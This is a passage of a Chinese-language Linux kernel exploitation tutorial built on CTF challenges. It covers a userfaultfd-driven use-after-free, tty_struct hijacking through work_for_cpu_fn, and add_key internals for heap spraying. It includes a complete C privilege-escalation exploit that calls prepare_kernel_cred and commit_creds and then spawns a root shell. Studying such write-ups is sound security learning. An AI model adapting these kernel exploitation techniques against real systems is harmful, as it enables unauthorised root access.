:two: 在noteedit的时候,我们如果传入size为0,他会调用krealloc来将我们原本的note->note块释放,然后他会调用copy_from_user函数,会访问我们用户传入的指针,然后监控线程检测到缺页访问,因此挂起该线程执行操作,但此时我们的note->note是仍然为释放后的堆地址的,且size位为0,因此就达成了一个UAF的条件 ,但是这里我们仍需要将size位置为非零值,因为我们总是要结束线程的,即使他理论上可以延长无限值。如果结束userfaultfd的时候size仍然为0,则按照ida反编译的情况来查看,他会覆盖掉我们的UAF地址,这样就会出现一个非预期错误。

然后size的修改我们采用noteadd函数当中的值,我们发现他是先修改掉size,然后会有个与用户交换数据的过程,此时我们再触发一次userfaultfd就可以了

:three: 此时如果我们在之前的note的大小为我们特殊构造的话,例如0x2e0,此时我们可以利用tty_struct来泄露内核的基地址,所以我们此时选则打开ptmx设备,而我们的tty_struct本身是可以泄露内核基地址的,在初始化tty_struct的时候,其中的tty_opreations会初始化为ptm_unix98_opspty_unix98_ops这两个全局变量,是谁是随机的,所以我们需要有一个判断,这里有一个坑点是我们从objdump -d vmlinux > symtable中的symtable是找不出这两个全局变量的,我们可以把vmlinunx拖入ida中来查找

这里有个难以理解的点就是,我们的tty_struct可能存在分配失败的情况,如下:

:four: 当我们构造了UAF的tty_struct后,我们就可以将我们的fake_operations布置在我们的notebook数组当中,这样我们可以任意修改其中的函数指针,就可以尽情的利用它了!

:five: 但是本题基本上能开的保护差不多都开了,所以我们的链条有点难构造,这里有一个小tips,介绍一种在多核内核下基本存在的一个函数work_for_cpu_fn

1
2
3
4
5
6
7
8
9
__int64 __fastcall work_for_cpu_fn(__int64 a1)
{
__int64 result; // rax

_fentry__();
result = (*(a1 + 0x20))(*(a1 + 0x28));
*(a1 + 0x30) = result;
return result;
}

可以发现该函数的一个功能就是调用*(rdi+0x20)(rdi + 0x28)这个函数,然后我们的返回值存放在(rdi+0x30)当中,而我们的file_operations上的函数第一个参数一般都是tty__struct,所以说我们就可以分次来调用preapare_kernel_cred(NULL)commit_creds()来进行提权,然后我们只需要正常的返回用户态即可,并不需要进行ROP里面的各类绕过,不用找那么多gadget了,很舒服。

:six: 最后我们需要恢复之前的tty_struct就正常返回调用system就可以了

5.结果&Exploit

如图,可达成稳定提权,下面就是本次的exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <syscall.h>
#include <poll.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <sched.h>

#define errExit(msg) do{ perror(msg); exit(EXIT_FAILURE); \
} while(0)

size_t commit_creds = NULL;
size_t prepare_kernel_cred = NULL;
int note_fd = 0;
int tty_fd = 0;
sem_t evil_add_sem, evil_edit_sem;
static char* page = "abcd";
static int page_size;

size_t PTM_UNIX98_OPS = 0xFFFFFFFF81E8E440;
size_t PTY_UNIX98_OPS = 0xFFFFFFFF81E8E320;
size_t WORK_FOR_CPU_FN = 0xffffffff8109eb90;
size_t PREPARE_KERNEL_CRED = 0xffffffff810a9ef0;
size_t COMMIT_CREDS = 0xffffffff810a9b40;

struct userarg{
size_t idx;
size_t size;
void* buf;
};


#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)

void saveStatus();
void info_log(char*);
void error_log(char*);
int userfaultfd_attack(char* addr, unsigned long len, void (*handler)(void *));
static void* fault_handler_thread(void * arg);
void addnote(size_t idx, size_t size, char* buf);
void editnote(size_t idx, size_t size, char* buf);
void deletenote(size_t idx);
void gift(char* buf);
void bind_cpu(int);

size_t user_cs, user_ss,user_rflags,user_sp;


void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
info_log("States has been saved successfully!");
}


void info_log(char* str){
printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
exit(1);
}


/* to run the exp on the specific core only */
void bind_cpu(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
info_log("CPU bind succesfully");
}

int userfaultfd_attack(char* addr, unsigned long len, void (*handler)(void *)){
PRINT_ADDR("starting to monitor", addr);
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
pthread_t monitor_thread;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if(uffd == -1)
errExit("userfaultfd");

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if(ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if(ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");

/* Create a thread that will process the userfaultfd events */
s = pthread_create(&monitor_thread, NULL, handler, (void *)uffd);

info_log("create thread...");
if(s != 0){
errno = s;
errExit("pthread_create");
}
}

static void* fault_handler_thread(void * arg){
static struct uffd_msg msg; /* data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long)arg;

/* Loop, handling incoming events on the userfaultfd file descriptor */
for(;;){
/* See what poll() tells us about the userfaultfd */
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if(nready == -1)
errExit("poll");

/* Read an event from the userfaultfd */
info_log("catch the user page fault!");
nread = read(uffd, &msg, sizeof(msg));

sleep(10000);
if(nread == 0){
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}
if(nread == -1)
errExit("read");

/* We expect only one king of evenr; verify that assuption */
if(msg.event != UFFD_EVENT_PAGEFAULT){
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}

/* copy things to the addr */

uffdio_copy.src = (unsigned long) page;
/* We need to handle page faults in units of pages(!).
* So, round faulting address down to page boundary */
uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(page_size - 1);

uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;

if(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");

}
}

void addnote(size_t idx, size_t size, char* buf){
struct userarg userargs;
userargs.idx = idx;
userargs.size = size;
userargs.buf = buf;
ioctl(note_fd, 0x100, &userargs);
}

void gift(char* buf){
struct userarg userargs;
userargs.idx = 0;
userargs.size = 10;
userargs.buf = buf;
ioctl(note_fd, 0x64, &userargs);
}

void editnote(size_t idx, size_t size, char* buf){
struct userarg userargs;
userargs.idx = idx;
userargs.size = size;
userargs.buf = buf;
ioctl(note_fd, 0x300, &userargs);
}

void deletenote(size_t idx){
struct userarg userargs;
userargs.idx = idx;
userargs.size = 0x10;
userargs.buf = 0;
ioctl(note_fd, 0x200, &userargs);
}

void thread_add(void* uffd_arg){
sem_wait(&evil_add_sem);
addnote(0, 0x60, uffd_arg);
}

void thread_edit(void* uffd_arg){
sem_wait(&evil_edit_sem);
editnote(0, 0, uffd_arg);
}


void main(){
bind_cpu(0);
page_size = sysconf(_SC_PAGE_SIZE);
note_fd = open("/dev/notebook", 2);
size_t fake_tty_struct[0x100], orig_tty_struct[0x100];
size_t fake_tty_operations_addr;
size_t vmlinux_offset;
size_t buf[0x30] = {0};

/* construct a monitored zone */
char* user_mmap = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
userfaultfd_attack(user_mmap, 0x1000, fault_handler_thread);

/*init the semaphore, and the value firstly be given a zero*/
sem_init(&evil_add_sem, 0, 0);
sem_init(&evil_edit_sem, 0, 0);
pthread_t thread_1, thread_2;

pthread_create(&thread_1, NULL, thread_add, (void*)user_mmap);
pthread_create(&thread_2, NULL, thread_edit, (void*)user_mmap);

addnote(0, 0x50, buf);
editnote(0, 0x2e0, buf);

sem_post(&evil_edit_sem); //we could run the thread_edit to get a UAF
sleep(1);

sem_post(&evil_add_sem); //use that to modify the size for 0 to not 0
sleep(1);
/* now we get a UAF chunk(0x2e0) with no zero size, so we can get the tty_struct*/
info_log("try to get the tty_struct");
tty_fd = open("/dev/ptmx", 2);
if(tty_fd <=0){
error_log("ptmx open failed");
}
read(note_fd, orig_tty_struct, 0);
if(*(int*)orig_tty_struct != 0x5401){ //mey be failed
error_log("pity,get a wrong tty!");
}
info_log("get right tty_struct!congratulation!");

/* get the kernel base offset */
vmlinux_offset = ((orig_tty_struct[3]&0xfff) == 0x440) ? (orig_tty_struct[3] - PTM_UNIX98_OPS): (orig_tty_struct[3] - PTY_UNIX98_OPS);
PRINT_ADDR("vmlinux_offset", vmlinux_offset);

/* hijack the tty_operations */
memcpy(fake_tty_struct, orig_tty_struct, 0x100);
addnote(1, 0x60, buf);
editnote(1, 0x2e0, buf);
gift(buf);
fake_tty_operations_addr = buf[2];
fake_tty_struct[3] = buf[2];

PRINT_ADDR("fake_tty_fops", fake_tty_struct[3]);
write(note_fd, fake_tty_struct,0);
buf[12] = WORK_FOR_CPU_FN + vmlinux_offset;
write(note_fd, buf, 1);
info_log("hijack done !");

/* construct the gadget */
/* prepare_kernel_cred(NULL) */
memcpy(fake_tty_struct, orig_tty_struct, 0x2e0);
fake_tty_struct[3] = fake_tty_operations_addr;
fake_tty_struct[4] = PREPARE_KERNEL_CRED + vmlinux_offset;
fake_tty_struct[5] = 0;
write(note_fd, fake_tty_struct, 0);
ioctl(tty_fd, 0x114514, 0x114514);

/* commit_creds */
read(note_fd, buf, 0);
fake_tty_struct[5] = buf[6];
fake_tty_struct[4] = COMMIT_CREDS + vmlinux_offset;
write(note_fd, fake_tty_struct, 0);
ioctl(tty_fd, 0x123, 0x123);

/* previledge evaluation finished */
/* recover the tty_struct */
write(note_fd, orig_tty_struct, 0);
system("/bin/sh");
}

五、Kernel Heap - Heap Spraying堆喷

In computer security, heap spraying is a technique used in exploits to facilitate arbitrary code execution. The part of the source code of an exploit that implements this technique is called a heap spray.[1] In general, code that sprays the heap attempts to put a certain sequence of bytes at a predetermined location in the memory of a target process by having it allocate (large) blocks on the process’s heap and fill the bytes in these blocks with the right values.

以上为wikipedia原文,其中介绍heap spray这项技术,普遍上,喷射到堆上面的代码尝试通过在目标进程堆分配大块并且在这些块当中布置恰当的值,来在提前预测的内存地点构造一个确定的字节序列。

堆喷这项技术并不是一个实质上的漏洞利用技术,而是一种辅助增强技术,也就是在程序存在明确漏洞但是难以利用的情况下,可以通过这类辅助技术来方便我们的漏洞利用,下面我们将通过例题来学习

例题:RWCTF2023体验赛 - Digging into kernel 3

1.题目逆向

首先就是启动脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/bin/sh                                                                               

qemu-system-x86_64 \
-m 128M \
-nographic \
-kernel ./bzImage \
--enable-kvm \
-initrd ./rootfs.img \
-cpu kvm64,+smap,+smep \
-monitor /dev/null \
-append 'console=ttyS0 kaslr kpti=1 quiet oops=panic panic=1 init=/init' \
-no-reboot \
-snapshot \
-s

基本上都开了,但是这里存在一个调试问题,在开启硬件加速后--enable-kvm,会导致gdb远程调试进入死中断,只要gdb发出了断点,内核就会进行处理,然后gdb再次恢复环境的时候再次触发内核中断(这仅仅是我个人的理解),所以如果你只(n/s)就会无限循环在同一行代码,但是你会发现如果你打断点在之后的代码他又会运行到那儿,但情况跟刚刚会完全一致,具体情况如下:

而要解决这个问题,在我的ubuntu20.04上只需要关闭硬件加速即可

然后就是我们文件系统的脚本init

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/bin/sh                                                    

mkdir /tmp
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs none /dev
mount -t tmpfs none /tmp

exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

insmod /rwctf.ko
chmod 666 /dev/rwctf
chmod 700 /flag
chmod 400 /proc/kallsyms

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

poweroff -d 120 -f &

echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds"
#setsid /bin/cttyhack setuidgid 0 /bin/sh
setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys
umount /tmp

poweroff -d 0 -f

插入了一个模块rwctf.ko

题目中所实现的函数仅仅只有以下几个:

1
2
3
4
5
rwmod_release	.text	        0000000000000000	00000007			R	.	.	.	.	.	.	.
rwmod_ioctl .text 0000000000000010 0000010D 00000038 R . . . . B . .
rwmod_open .text.unlikely 000000000000011D 00000013 R . . . . . . .
rwmod_init .init.text 0000000000000130 0000004F 00000008 R . . . . . . .
rwmod_exit .exit.text 000000000000017F 0000000C R . . . . . . .

其中比较重要的核心点就是rwmod_ioctl函数,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
__int64 __fastcall rwmod_ioctl(__int64 a1, int a2, __int64 userarg)
{
__int64 v3; // r12
__int64 v5; // rbx
__int64 kmalloc_ptr; // rdi
unsigned int idx; // [rsp+0h] [rbp-30h] BYREF
unsigned int size; // [rsp+4h] [rbp-2Ch]
void *buffer; // [rsp+8h] [rbp-28h]
unsigned __int64 v10; // [rsp+18h] [rbp-18h]

v10 = __readgsqword(0x28u);
if ( !userarg )
return -1LL;
if ( a2 == 0xC0DECAFE )
{
if ( !copy_from_user(&idx, userarg, 16LL) && idx <= 1 )
kfree(buf[idx]);
return 0LL;
}
v3 = -1LL;
if ( a2 == 0xDEADBEEF )
{
if ( copy_from_user(&idx, userarg, 16LL) )
return 0LL;
v5 = idx;
if ( idx > 1 )
return 0LL;
buf[v5] = _kmalloc(size, 3520LL);
kmalloc_ptr = buf[idx];
if ( !kmalloc_ptr )
return 0LL;
if ( size > 0x7FFFFFFFuLL )
BUG();
if ( copy_from_user(kmalloc_ptr, buffer, size) )
return 0LL;
}
return v3;
}

我们传入的参数为下面的结构体

userarg(0x16)
idx(0x4)
size(0x4)
buffer(0x8)

然后有两个选项

  1. 0xC0DECAFE: kfree块,但存在悬垂指针

  2. 0xDEADBEEF: 按照传入的size来kmalloc一定大小的块

所以这里我们可以看到程序是存在很多个UAF

2.add_key基础知识

内核中存在一个密钥管理系统,他通过keyctl这个系统调用提供的接口来进行读取、修改、注销等功能,如下是linux手册当中的解释

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
NAME
keyctl - manipulate the kernel's key management facility

SYNOPSIS
#include <sys/types.h>
#include <keyutils.h>

long keyctl(int operation, ...)

/* For direct call via syscall(2): */
#include <asm/unistd.h>
#include <linux/keyctl.h>
#include <unistd.h>

long syscall(__NR_keyctl, int operation, __kernel_ulong_t arg2,
__kernel_ulong_t arg3, __kernel_ulong_t arg4,
__kernel_ulong_t arg5);

No glibc wrapper is provided for this system call; see NOTES.

DESCRIPTION
keyctl() allows user-space programs to perform key manipulation. //允许用户进行密钥操作

The operation performed by keyctl() is determined by the value of the operation argument. Each of these operations is wrapped by the libkeyutils library (provided by the keyutils package) into individual functions
(noted below) to permit the compiler to check types.

NOTES
No wrapper for this system call is provided in glibc. A wrapper is provided in the libkeyutils library. When employing the wrapper in that library, link with -lkeyutils. However, rather than using this system call
directly, you probably want to use the various library functions mentioned in the descriptions of individual operations above.

通过描述我们可以简单的了解到他是为了迁就用户空间来使用密钥相关的操作,还有一个需要注意的点那就是glibc不包含该系统调用,需要链接的时候额外加上-lkeyutils链接外部包才可以使用它。

我们知道了密钥管理的相关系统调用,那这个密钥从哪儿来呢?同样,内核提供了另一个系统调用add_key()来创建密钥,解释如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
NAME
add_key - add a key to the kernel's key management facility

SYNOPSIS
#include <sys/types.h>
#include <keyutils.h>

key_serial_t add_key(const char *type, const char *description,
const void *payload, size_t plen,
key_serial_t keyring);

No glibc wrapper is provided for this system call; see NOTES.

DESCRIPTION
add_key() creates or updates a key of the given type and description, instantiates it with the payload of length plen, attaches it to the nominated keyring, and returns the key's serial number.

The key may be rejected if the provided data is in the wrong format or it is invalid in some other way.

If the destination keyring already contains a key that matches the specified type and description, then, if the key type supports it, that key will be updated rather than a new key being created; if not, a new key
(with a different ID) will be created and it will displace the link to the extant key from the keyring.

The destination keyring serial number may be that of a valid keyring for which the caller has write permission. Alternatively, it may be one of the following special keyring IDs:

KEY_SPEC_THREAD_KEYRING
This specifies the caller's thread-specific keyring (thread-keyring(7)).

KEY_SPEC_PROCESS_KEYRING
This specifies the caller's process-specific keyring (process-keyring(7)).

KEY_SPEC_SESSION_KEYRING
This specifies the caller's session-specific keyring (session-keyring(7)).

KEY_SPEC_USER_KEYRING
This specifies the caller's UID-specific keyring (user-keyring(7)).

KEY_SPEC_USER_SESSION_KEYRING
This specifies the caller's UID-session keyring (user-session-keyring(7)).

add_key() 创建或更新给定类型和描述的密钥,使用长度为 plen 的有效负载实例化它,将其附加到指定的keyring,并返回密钥的序列号。如果提供的数据格式错误或在其他方面无效,则密钥可能会被拒绝。

如果目标keyring已包含与指定类型和描述匹配的密钥,那么,如果密钥类型支持它,则将更新该密钥,而不是创建新密钥; 如果没有,则使用新密钥(使用不同的 ID)将被创建,并将替换keyring中现有密钥的链接。目的地keyring序列号可以是调用者具有写入权限的有效密钥环的序列号。

这里来简单解释以下keyring是什么:直译过来就是钥匙环,也就是咱们平时挂钥匙的地方,也算得上是一个钥匙们的集合,使用它可以方便咱们密钥的分类管理,他基本上给钥匙分了以下三类:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
(+) "keyring"

Keyrings are special keys that contain a list of other keys. Keyring
lists can be modified using various system calls. Keyrings should not
be given a payload when created.

(+) "user"

A key of this type has a description and a payload that are arbitrary
blobs of data. These can be created, updated and read by userspace,
and aren't intended for use by kernel services.

(+) "logon"

Like a "user" key, a "logon" key has a payload that is an arbitrary
blob of data. It is intended as a place to store secrets which are
accessible to the kernel but not to userspace programs.

The description can be arbitrary, but must be prefixed with a non-zero
length string that describes the key "subclass". The subclass is
separated from the rest of the description by a ':'. "logon" keys can
be created and updated from userspace, but the payload is only
readable from kernel space.

找系统调用的方法如下几步:

  1. 内核源码include/linux/syscalls.h
  2. 找到对应的系统调用,然后一般上面会有注释在哪个文件夹下
  3. 新版本系统调用一般实现为SYSCALL_DEFINE<x>(系统调用名, ...),老版本一般为sys_open()等。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
/*
* Extract the description of a new key from userspace and either add it as a
* new key to the specified keyring or update a matching key in that keyring.
*
* If the description is NULL or an empty string, the key type is asked to
* generate one from the payload.
*
* The keyring must be writable so that we can attach the key to it.
*
* If successful, the new key's serial number is returned, otherwise an error
* code is returned.
*/
SYSCALL_DEFINE5(add_key, const char __user *, _type,
const char __user *, _description,
const void __user *, _payload,
size_t, plen,
key_serial_t, ringid)
{
key_ref_t keyring_ref, key_ref;
char type[32], *description;
void *payload;
long ret;

ret = -EINVAL;
if (plen > 1024 * 1024 - 1)
goto error;

/* draw all the data into kernel space */
ret = key_get_type_from_user(type, _type, sizeof(type)); //类型拷贝
if (ret < 0)
goto error;

description = NULL;
if (_description) {
description = strndup_user(_description, KEY_MAX_DESC_SIZE);
if (IS_ERR(description)) {
ret = PTR_ERR(description);
goto error;
}
if (!*description) {
kfree(description);
description = NULL;
} else if ((description[0] == '.') &&
(strncmp(type, "keyring", 7) == 0)) {
ret = -EPERM;
goto error2;
}
}

/* pull the payload in if one was supplied */
payload = NULL;

if (plen) {
ret = -ENOMEM;
payload = kvmalloc(plen, GFP_KERNEL);
if (!payload)
goto error2;

ret = -EFAULT;
if (copy_from_user(payload, _payload, plen) != 0)
goto error3;
}

/* find the target keyring (which must be writable) */
keyring_ref = lookup_user_key(ringid, KEY_LOOKUP_CREATE, KEY_NEED_WRITE);
if (IS_ERR(keyring_ref)) {
ret = PTR_ERR(keyring_ref);
goto error3;
}

/* create or update the requested key and add it to the target
* keyring */
key_ref = key_create_or_update(keyring_ref, type, description,
payload, plen, KEY_PERM_UNDEF,
KEY_ALLOC_IN_QUOTA);
if (!IS_ERR(key_ref)) {
ret = key_ref_to_ptr(key_ref)->serial;
key_ref_put(key_ref);
}
else {
ret = PTR_ERR(key_ref);
}

key_ref_put(keyring_ref);
error3:
kvfree_sensitive(payload, plen);
error2:
kfree(description);
error:
return ret;
}

下面进行一个简短的分析,并记录我们所分配的object。

object1、object2–存放临时的description和大小为plen的payload

  1. 将传入的用户类型拷贝到内核的局部变量
  2. 调用strndup_user,其中参数#define KEY_MAX_DESC_SIZE 4096 ,里面的一条调用链最终会归到p = kmalloc_track_caller(len, GFP_USER | __GFP_NOWARN);,也就是说会创建一个内核堆块来存放我们的_description,而其中GFP_USER等价于GFP_KERNEL | __GFP_HARDWALL
  3. 然后先判断咱们是否有payload,若有,则通过kvmalloc函数来进行分配堆块,然后复制咱们的用户信息过去,这里的kvmalloc的功能实际上就是kmalloc和vmalloc的集合体,在分配一页以下的堆块时可看作使用kmalloc,否则使用vmalloc
  4. 以上两个堆块的申请在最后还是会释放,其中调用kvfree_sensitivekfree来进行释放

上面时单独这个系统调用的宏观分析,乍一看好像对我们的利用帮助并不大,但其实咱们还需要进一步分析,在调用上面的系统调用时,他会进入下面这个函数

1
2
3
4
5
/* create or update the requested key and add it to the target
* keyring */
key_ref = key_create_or_update(keyring_ref, type, description,
payload, plen, KEY_PERM_UNDEF,
KEY_ALLOC_IN_QUOTA);

从注释也可以观察到,他可以创建和更新一个需求的密钥,并且加入咱们的钥匙扣,跟进会发现有如下调用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/*
* Create or potentially update a key. The combined logic behind
* key_create_or_update() and key_create()
*/
static key_ref_t __key_create_or_update(key_ref_t keyring_ref,
const char *type,
const char *description,
const void *payload,
size_t plen,
key_perm_t perm,
unsigned long flags,
bool allow_update)
{
struct keyring_index_key index_key = {
.description = description,
};
struct key_preparsed_payload prep;
struct assoc_array_edit *edit = NULL;
const struct cred *cred = current_cred();
struct key *keyring, *key = NULL;
key_ref_t key_ref;
int ret;
struct key_restriction *restrict_link = NULL;
...

/* allocate a new key */
key = key_alloc(index_key.type, index_key.description,
cred->fsuid, cred->fsgid, cred, perm, flags, NULL);
...
}

其中会调用key_alloc这样一个函数、

objecy3–分配struct key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct key *key_alloc(struct key_type *type, const char *desc,
kuid_t uid, kgid_t gid, const struct cred *cred,
key_perm_t perm, unsigned long flags,
struct key_restriction *restrict_link)
{
struct key_user *user = NULL;
struct key *key;
size_t desclen, quotalen;
int ret;
...

desclen = strlen(desc);
quotalen = desclen + 1 + type->def_datalen;

...

/* allocate and initialise the key and its description */
key = kmem_cache_zalloc(key_jar, GFP_KERNEL);
if (!key)
goto no_memory_2;

key->index_key.desc_len = desclen;
key->index_key.description = kmemdup(desc, desclen + 1, GFP_KERNEL);
...
}

这里可以看到他在一个kmem_cache类型的全局变量key_jar里面分配了堆块,且标志位应为__GFP_ZERO|GFP_KERNEL,他用来分配咱们的key值,也就是咱们的密钥结构体,并且香气中拷贝了长度以及描述,这个kmemdup函数的大致过程就是首先kmalloc一个堆块,然后调用memcpy拷贝我们的描述过去;

然后我们回到__key_create_or_update的分析,在调用key_alloc之前,他会首先再次分配一个堆块,我们进行其中部分代码的分析,如下:

1
2
3
4
5
6
7
8
9
10
...
memset(&prep, 0, sizeof(prep));
prep.orig_description = description;
prep.data = payload;
prep.datalen = plen;
prep.quotalen = index_key.type->def_datalen;
prep.expiry = TIME64_MAX;
if (index_key.type->preparse) {
ret = index_key.type->preparse(&prep);
...

这里会调用到index_key.type->preparse()函数,其中该type如何判断是什么呢,我们可以找到该type的赋值判断过程,然后发现是由于我们最开始add_key的系统调用里面传入一个字符串,然后通过一个函数来根据该传入的字符串从一个内核全局列表里面遍历查找是否有类似的type,因此我就把寻找目标定在初始化函数里面,这个列表名我们知道,因此可以简单的通过一些源码查看工具找到初始化函数,然后就可以看到其中的一些类别,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
* Initialise the key management state.
*/
void __init key_init(void)
{
/* allocate a slab in which we can store keys */
key_jar = kmem_cache_create("key_jar", sizeof(struct key),
0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, NULL);

/* add the special key types */
list_add_tail(&key_type_keyring.link, &key_types_list);
list_add_tail(&key_type_dead.link, &key_types_list);
list_add_tail(&key_type_user.link, &key_types_list);
list_add_tail(&key_type_logon.link, &key_types_list);

/* record the root user tracking */
rb_link_node(&root_key_user.node,
NULL,
&key_user_tree.rb_node);

rb_insert_color(&root_key_user.node,
&key_user_tree);
}

可以看到该list里面有上面四种情况,而由于我们仅仅关注user方面的,所以仅看其中一种即可,user type的key如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/*
* user defined keys take an arbitrary string as the description and an
* arbitrary blob of data as the payload
*/
struct key_type key_type_user = {
.name = "user",
.preparse = user_preparse,
.free_preparse = user_free_preparse,
.instantiate = generic_key_instantiate,
.update = user_update,
.revoke = user_revoke,
.destroy = user_destroy,
.describe = user_describe,
.read = user_read,
};

我们回到刚刚的__key_create_or_update,里面调用了我们user的函数.preparse,他指向我们的user_preparse函数,我们可以往下继续看

object4–分配user_key_payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/*
* Preparse a user defined key payload
*/
int user_preparse(struct key_preparsed_payload *prep)
{
struct user_key_payload *upayload;
size_t datalen = prep->datalen;

if (datalen <= 0 || datalen > 32767 || !prep->data)
return -EINVAL;

upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);
if (!upayload)
return -ENOMEM;

/* attach the data */
prep->quotalen = datalen;
prep->payload.data[0] = upayload;
upayload->datalen = datalen;
memcpy(upayload->data, prep->data, datalen);
return 0;
}

函数并不是很长,大致含义会再次分配一个user_key_payload的结构体加上我们之前传入的plen大小的堆块,这个user_key_payload即是作为一个保护头而存在,其中该结构体如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/*****************************************************************************/
/*
* the payload for a key of type "user" or "logon"
* - once filled in and attached to a key:
* - the payload struct is invariant may not be changed, only replaced
* - the payload must be read with RCU procedures or with the key semaphore
* held
* - the payload may only be replaced with the key semaphore write-locked
* - the key's data length is the size of the actual data, not including the
* payload wrapper
*/
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[] __aligned(__alignof__(u64)); /* actual data */
};

而其中的rcu_head字段如下:

1
2
3
4
5
#define rcu_head callback_head
struct callback_head {
struct callback_head *next;
void (*func)(struct callback_head *);
};

也就是说最后object4会保存一段的user_key_payload头和我们的payload数据。其中头部到达数据的距离为0x18字节,这是因为存在对齐关键字。

综上所述,add_key系统调用过程有以下几个步骤:

  1. 判断description是否为空来分配相应大小的临时堆块object1
  2. 根据plen来分配传入payload的临时堆块object2
  3. 分配我们的user_key_payload堆块object3,其中包含的内容一部分是0x18大小的头部以及剩下的我们自行传入的payload
  4. 分配struct key堆块object4,注意这里是使用独立的kmem_cache key_jar来分配,返回keyid
  5. 释放临时堆块object1、object2

3.keyctl基础知识

我们了解到了如何通过系统调用来获得key,那么现在我们如何利用它呢,这里就得介绍一下我们的keyctl系统调用,手册在解释add_key系统调用的时候就已经列出

